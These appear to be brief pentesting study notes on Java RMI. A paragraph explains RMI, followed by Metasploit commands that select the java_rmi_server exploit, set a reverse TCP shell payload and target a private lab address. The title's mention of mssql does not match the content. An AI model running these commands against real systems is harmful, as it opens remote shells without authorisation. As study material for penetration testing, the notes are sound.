1100 - Pentesting mssql rmi java
RMI (Remote Method Invocation) is a Java API that allows Java objects to invoke methods on remote objects, in other words, it enables Java applications to invoke methods of objects running on remote JVMs (Java Virtual Machines). It provides a mechanism for creating distributed Java applications, where objects on different JVMs can interact with each other.
nmap
metasploit
use exploit/multi/misc/java_rmi_server
show payloads
set pyload payload/generic/shell_reverse_tcp
set RHOSTS 10.0.2.8